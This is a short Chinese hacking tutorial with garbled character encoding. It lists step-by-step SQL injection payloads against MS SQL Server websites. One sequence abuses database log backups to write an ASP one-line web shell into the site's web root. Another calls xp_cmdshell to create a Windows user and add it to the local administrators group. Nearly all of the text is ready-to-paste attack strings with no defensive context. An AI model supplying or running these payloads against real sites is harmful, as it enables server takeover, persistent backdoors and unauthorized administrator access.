手工實現差異備份的步驟

字符型：

1、恢復當前庫
;alter database 當前庫 set RECOVERY FULL--

2、建表cmd
;create table cmd (a image)--

3、備份當前庫到D:\cmd1
;backup log 當前庫 to disk = 'D:\cmd1' with init--

4、插入一句話代碼到創(chuàng)建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')-- 

5、備份一句話代碼到站點根目錄
;backup log 當前庫 to disk = 'D:\www_web\oct.asp'--

6、完成
;drop table 創(chuàng)建的表--

數字型

1、恢復當前庫
';alter database 當前庫 set RECOVERY FULL--

2、創(chuàng)建表cmd
';create table cmd (a image)--

3、備份當前庫到D:\cmd1
';backup log 當前庫 to disk = 'D:\cmd1' with init--

4、插入一句話代碼到創(chuàng)建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')-- 

5、備份一句話代碼到站點根目錄
';backup log 當前庫 to disk = 'D:\www_web\oct.asp'--

6、完成
';drop table 創(chuàng)建的表--

sa權限創(chuàng)建管理員用戶

1、判斷是否有注入;and 1=1 ;and 1=2 
;and user_name()='dbo' 判斷當前系統(tǒng)的連接用戶是不是sa

2、添加系統(tǒng)的管理員
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--

逍遙復仇：有工具我是一定不會手工的，麻煩。